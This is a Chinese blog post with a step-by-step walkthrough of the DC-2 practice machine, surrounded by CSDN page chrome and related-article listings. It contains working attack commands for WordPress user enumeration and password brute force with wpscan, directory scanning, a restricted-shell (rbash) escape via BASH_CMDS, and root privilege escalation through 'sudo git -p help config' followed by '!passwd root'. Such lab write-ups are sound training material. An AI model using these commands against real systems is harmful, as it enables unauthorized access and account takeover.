DC靶机系列-------2

最新推荐文章于 2024-08-09 22:52:34 发布
最新推荐文章于 2024-08-09 22:52:34 发布
阅读量96 收藏
点赞数
分类专栏: # 靶机实战 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ppbgi/article/details/117000674
版权
  • 一、扫描ip地址
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    直接查看无法查看,所以在kali中的hosts中进行配置

在这里插入图片描述
在这里插入图片描述

  • 二、
    在这里插入图片描述
    flag中提示用cewl,使用cewl生成字典进行爆破;
    在这里插入图片描述
  • 三、
    使用wpscan进行当前用户的扫描:
wpscan --url http://dc-2
wpscan --url http://dc-2/ -e

在这里插入图片描述

  • 四、漏洞攻击
    利用wpscan来进行密码的爆破;先将之前爆破的用户与之前在页面的flag作的密码结合进行爆破
touch username.txt
vim username.txt
wpscan --url http://dc-2/ -U username.txt -P pwd.txt

在这里插入图片描述
目录扫描:

dirb http://dc-2

在这里插入图片描述
使用jerry进行登录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在当前路径下发现flag3,使用less进行flag3的读取
在这里插入图片描述
在这里插入图片描述
无法使用su来跳到jerry用户
因为无法使用su命令所以需要绕过rbash(受限制的bash)

tom@DC2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC2:~$ export PATH=$PATH:/bin/
tom@DC2:~$ export PATH=$PATH:/usr/bin

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 五、提权
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
参考文章:https://laosec.cn/2021/05/11/%e9%9d%b6%e6%9c%ba%e7%b3%bb%e5%88%97-dc_2/

附:修改root用户密码;

sudo git -p help config
!whoami
!passwd root

在这里插入图片描述
在这里插入图片描述

Hero.Youth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC综合——学习笔记
zgezi的博客
08-06 4万+
综合所需要的文件: RTL设计文件(DUT的内容); 标准单元的库文件; 其他库文件(如IO库,IP库等等); 综合输出的文件: 综合后的门级网表; 带时序约束信息的sdc文件: 其他一些后端需要用的特殊配置,如dont_touch设置等 保留综合结果的ddc文件(之后可以直接load这个文件,查看综合结果); 综合的基本流程: 两种启动DC方式: dc_shell design_vision dc打开时会自动运行当前目录下的.synopsys_dc.setup文件。一些统一的参数配置等可以写在这个文件里。
靶机DC-2 WP
m0_66638011的博客
05-13 646
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
DC-9靶机
2301_76690905的博客
12-21 1018
端口敲门规则的好处在于隐藏了服务器的实际开放端口,只有知道正确的敲门序列的客户端才能访问服务器,/etc/knockd.conf 文件是 Knockd 服务的配置文件,它用于指定 Knockd 敲门规则,Knockd 是一种端口伪装技术,可以通过在指定的端口序列上发送特殊的数据包来打开一个或多个防火墙规则以允许传入的连接请求通过。
DC系列靶机DC-1
weixin_53067829的博客
07-01 988
DC系列靶机
DC靶机1-9
qq_60905276的博客
01-22 4684
1.DC1 首先我们不知道靶机的ip地址,我们通过
靶机DC-1 WP
m0_66638011的博客
05-11 1705
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1502
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
靶机DC-3—WP
m0_66638011的博客
05-17 1390
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
靶机DC-4—WP
m0_66638011的博客
06-22 965
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
深入探讨安全验证:OAuth2.0、Cookie与Session、JWT令牌、SSO与开放授权平台设计
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
08-09 919
CSRF(Cross-Site Request Forgery)攻击是一种利用受害者在已经认证的状态下执行非意愿操作的攻击方式。攻击者通过诱使受害者访问恶意网站或点击恶意链接,来执行未经授权的操作,例如修改密码、进行转账等,简单来说就是,由于cookie是在浏览器共享的,所以一旦设置了cookie,那么当你打开另一个tab页的时候,也会携带过去,那么其他站点就可以使用cookie进行攻击,具体如下:比如:当你在浏览器中打开银行A的网页并成功登录后,你想要进行转账操作。
关闭Windows安全中心
applelin的博客
08-08 324
打开Windows安全中心的病毒和威胁防护。打开该选项的管理设置。
DLMS/COSEM中的信息安全安全密钥(中)
最新发布
huaqianzkh的专栏
08-09 624
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1450
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值